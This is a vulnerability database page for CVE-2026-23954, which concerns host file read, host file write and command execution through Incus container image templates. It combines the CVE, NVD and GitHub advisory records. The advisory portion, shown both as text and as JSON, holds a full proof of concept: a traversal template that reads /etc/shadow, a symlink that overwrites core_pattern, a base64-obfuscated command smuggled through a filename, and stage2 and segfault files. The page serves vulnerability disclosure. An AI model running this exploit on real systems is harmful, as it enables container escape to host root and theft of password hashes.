Vulnerability-Lookup

CVE-2026-23954 (GCVE-0-2026-23954)

Vulnerability from cvelistv5 – Published: 2026-01-22 21:45 – Updated: 2026-01-22 21:45

Title

Incus container image templating arbitrary host file read and write

Summary

Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g a member of the ‘incus’ group) to use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. This can also be exploited in IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication.

Severity ?

8.7 (High)


                        
                          CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/lxc/incus/security/advisories/…	x_refsource_CONFIRM
	https://github.com/lxc/incus/blob/HEAD/internal/s…	x_refsource_MISC
	https://github.com/lxc/incus/blob/HEAD/internal/s…	x_refsource_MISC
	https://github.com/user-attachments/files/2447359…	x_refsource_MISC
	https://github.com/user-attachments/files/2447360…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	lxc	incus	Affected: >= 6.1.0, <= 6.20.0 Affected: <= 6.0.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "incus",
          "vendor": "lxc",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 6.1.0, \u003c= 6.20.0"
            },
            {
              "status": "affected",
              "version": "\u003c= 6.0.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g a member of the \u2018incus\u2019 group) to use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. This can also be exploited in IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-22T21:45:55.696Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7"
        },
        {
          "name": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215"
        },
        {
          "name": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294"
        },
        {
          "name": "https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh"
        },
        {
          "name": "https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch"
        }
      ],
      "source": {
        "advisory": "GHSA-7f67-crqm-jgh7",
        "discovery": "UNKNOWN"
      },
      "title": "Incus container image templating arbitrary host file read and write"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-23954",
    "datePublished": "2026-01-22T21:45:55.696Z",
    "dateReserved": "2026-01-19T14:49:06.312Z",
    "dateUpdated": "2026-01-22T21:45:55.696Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-23954\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-22T22:16:20.833\",\"lastModified\":\"2026-01-22T22:16:20.833\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g a member of the \u2018incus\u2019 group) to use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. This can also be exploited in IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"ADJACENT_NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":5.8}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-23954

Vulnerability from fkie_nvd - Published: 2026-01-22 22:16 - Updated: 2026-01-22 22:16

Severity ?

8.7 (High) - CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215
	security-advisories@github.com	https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294
	security-advisories@github.com	https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7
	security-advisories@github.com	https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh
	security-advisories@github.com	https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g a member of the \u2018incus\u2019 group) to use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. This can also be exploited in IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication."
    }
  ],
  "id": "CVE-2026-23954",
  "lastModified": "2026-01-22T22:16:20.833",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "ADJACENT_NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 5.8,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-22T22:16:20.833",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-7F67-CRQM-JGH7

Vulnerability from github – Published: 2026-01-22 20:26 – Updated: 2026-01-23 15:46

Summary

Incus container image templating arbitrary host file read and write

Details

Summary

A user with the ability to launch a container with a custom image (e.g a member of the ‘incus’ group) can use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write, ultimately resulting in arbitrary command execution on the host. This can also be exploited in IncusOS.

Details

When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. [1] [2] For example, the following metadata.yaml snippet can read an arbitrary file from the host root filesystem as root, and place it inside the container:

templates:
  /shadow:
    when:
      - start
    template: ../../../../../../../../etc/shadow

Additionally, the path of the target of the template is not checked or opened safely, and can therefore contain symbolic links pointing outside the container root filesystem. For example:

templates:
 /realroot/proc/sys/kernel/core_pattern:
    when:
      - start
    template: core_pattern.tpl

Where the container root filesystem contains a symbolic link named /realroot pointing to /. This will cause the contents of the template (from the normal "templates" directory in this case) to be written to the host root filesystem as root.

This can be exploited to achieve arbitrary command execution on the host by overwriting key files. In the provided proof of concept, I am overwriting /proc/sys/kernel/core_pattern, followed by causing a crash inside the container once launched to execute arbitrary commands on the host. Many other methods are possible depending on the host operating system and configuration.

This vulnerability can be exploited by any user who can launch a new container with a custom image.

Exploiting this vulnerability on IncusOS requires a slight modification of stage2 to change to a different writable directory for the validation step (e.g /tmp). This can be confirmed with a second container with /tmp mounted from the host (A privileged action for validation only).

[1] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215 [2] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294

PoC

A proof of concept script for the following can be found attached, named template_arbitrary_write.sh, which will show reading of a file from the host filesystem (/etc/shadow), as well as a method for escaping from the container to achieve arbitrary command execution, which will write a file to the root filesystem (/template_arbitrary_write_cmd_exec_poc).

Manual Reproduction steps:

Obtain and unpack a legitimate root filesystem (e.g alpine/edge) into a directory named rootfs
Inside the unpacked root filesystem, create a symbolic link named ‘realroot’ (i.e ln -s / rootfs/realroot)
Create a directory named “templates” alongside the rootfs directory. Include a file core_pattern.tpl containing |/bin/sh -c "%E"
Additionally, add files segfault.c and stage2 to the root filesystem (listed below), setting stage2 executable (chmod +x rootfs/stage2
Create a metadata.yaml for this image. Sample listed below
Create the image archive (tar cf poc.tar *) and import into incus (incus image import poc.tar --alias poc)
Launch the newly imported image and obtain a shell (incus launch poc poc --ephemeral; incus shell poc)
Observe that the file /shadow inside the container contains the contents of the /etc/shadow file from the host (host file read vulnerability)
Compile segfault.c into a file named x$(echo L3Zhci9saWIvaW5jdXMvY29udGFpbmVycy8qL3Jvb3Rmcy9zdGFnZTIK|base64 -d|sh). This filename will be interpolated into the %E value set in the core_pattern by the host file write vulnerability, and will find and execute the stage2 binary inside the container rootfs.
Execute the compiled binary (e.g /x*). Observe the creation of the file /template_arbitrary_write_cmd_exec_poc on the host, containing the output of 'id' showing command execution by the host root user.

segfault.c:

int main() {
    int *p = 0;
    *p = 42;
    return 0;
}

stage2:

#!/bin/sh
id > /template_arbitrary_write_cmd_exec_poc

metadata.yaml:

architecture: x86_64
creation_date: 1
properties:
  architecture: amd64
  description: Exploit
  os: Exploit
  release: Exploit 1.0
templates:
  /shadow:
    when:
      - start
    template: ../../../../../../../../etc/shadow

  /realroot/proc/sys/kernel/core_pattern:
    when:
      - start
    template: core_pattern.tpl

Impact

A user with the ability to launch a container with a custom image can achieve arbitrary command execution on the host.

Attachments

template_arbitrary_write.sh templates_arbitrary_write.patch

Severity ?

8.7 (High)


                  
                    CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lxc/incus/v6/cmd/incusd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.1.0"
            },
            {
              "last_affected": "6.20.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lxc/incus/v6/cmd/incusd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "6.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23954"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-22T20:26:10Z",
    "nvd_published_at": "2026-01-22T22:16:20Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA user with the ability to launch a container with a custom image (e.g a member of the \u2018incus\u2019 group) can use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write, ultimately resulting in arbitrary command execution on the host. This can also be exploited in IncusOS.\n\n### Details\nWhen using an image with a `metadata.yaml` containing templates, both the source and target paths are not checked for symbolic links or directory traversal. [1] [2] For example, the following `metadata.yaml` snippet can read an arbitrary file from the host root filesystem as root, and place it inside the container:\n\n```\ntemplates:\n  /shadow:\n    when:\n      - start\n    template: ../../../../../../../../etc/shadow\n```\n\nAdditionally, the path of the target of the template is not checked or opened safely, and can therefore contain symbolic links pointing outside the container root filesystem. For example:\n\n```\ntemplates:\n /realroot/proc/sys/kernel/core_pattern:\n    when:\n      - start\n    template: core_pattern.tpl\n```\n\nWhere the container root filesystem contains a symbolic link named `/realroot` pointing to `/`. This will cause the contents of the template (from the normal \"templates\" directory in this case) to be written to the host root filesystem as root.\n\nThis can be exploited to achieve arbitrary command execution on the host by overwriting key files. In the provided proof of concept, I am overwriting `/proc/sys/kernel/core_pattern`, followed by causing a crash inside the container once launched to execute arbitrary commands on the host. Many other methods are possible depending on the host operating system and configuration.\n\nThis vulnerability can be exploited by any user who can launch a new container with a custom image.\n\nExploiting this vulnerability on IncusOS requires a slight modification of stage2 to change to a different writable directory for the validation step (e.g /tmp). This can be confirmed with a second container with `/tmp` mounted from the host (A privileged action for validation only).\n\n\n[1] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215\n[2] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294\n\n### PoC\nA proof of concept script for the following can be found attached, named `template_arbitrary_write.sh`, which will show reading of a file from the host filesystem (`/etc/shadow`), as well as a method for escaping from the container to achieve arbitrary command execution, which will write a file to the root filesystem (`/template_arbitrary_write_cmd_exec_poc`).\n\nManual Reproduction steps:\n\n1. Obtain and unpack a legitimate root filesystem (e.g alpine/edge) into a directory named rootfs\n2. Inside the unpacked root filesystem, create a symbolic link named \u2018realroot\u2019 (i.e `ln -s / rootfs/realroot`)\n3. Create a directory named \u201ctemplates\u201d alongside the rootfs directory. Include a file `core_pattern.tpl` containing `|/bin/sh -c \"%E\"`\n4. Additionally, add files segfault.c and stage2 to the root filesystem (listed below), setting stage2 executable (`chmod +x rootfs/stage2`\n5. Create a `metadata.yaml` for this image. Sample listed below\n6. Create the image archive (`tar cf poc.tar *`) and import into incus (`incus image import poc.tar --alias poc`)\n7. Launch the newly imported image and obtain a shell (`incus launch poc poc --ephemeral; incus shell poc`)\n8. Observe that the file `/shadow` inside the container contains the contents of the `/etc/shadow` file from the host (host file read vulnerability)\n9. Compile `segfault.c` into a file named `x$(echo L3Zhci9saWIvaW5jdXMvY29udGFpbmVycy8qL3Jvb3Rmcy9zdGFnZTIK|base64 -d|sh)`. This filename will be interpolated into the `%E` value set in the `core_pattern` by the host file write vulnerability, and will find and execute the stage2 binary inside the container rootfs.\n10. Execute the compiled binary (e.g `/x*`). Observe the creation of the file `/template_arbitrary_write_cmd_exec_poc` on the host, containing the output of \u0027id\u0027 showing command execution by the host root user.\n\nsegfault.c:\n```\nint main() {\n    int *p = 0;\n    *p = 42;\n    return 0;\n}\n```\n\nstage2:\n```\n#!/bin/sh\nid \u003e /template_arbitrary_write_cmd_exec_poc\n```\n\nmetadata.yaml:\n```\narchitecture: x86_64\ncreation_date: 1\nproperties:\n  architecture: amd64\n  description: Exploit\n  os: Exploit\n  release: Exploit 1.0\ntemplates:\n  /shadow:\n    when:\n      - start\n    template: ../../../../../../../../etc/shadow\n\n  /realroot/proc/sys/kernel/core_pattern:\n    when:\n      - start\n    template: core_pattern.tpl\n```\n\n### Impact\nA user with the ability to launch a container with a custom image can achieve arbitrary command execution on the host.\n\n### Attachments\n[template_arbitrary_write.sh](https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh)\n[templates_arbitrary_write.patch](https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch)",
  "id": "GHSA-7f67-crqm-jgh7",
  "modified": "2026-01-23T15:46:34Z",
  "published": "2026-01-22T20:26:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23954"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lxc/incus"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294"
    },
    {
      "type": "WEB",
      "url": "https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Incus container image templating arbitrary host file read and write"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-23954 (GCVE-0-2026-23954)

FKIE_CVE-2026-23954

GHSA-7F67-CRQM-JGH7

Summary

Details

PoC

Impact

Attachments

Tags

Sightings

Nomenclature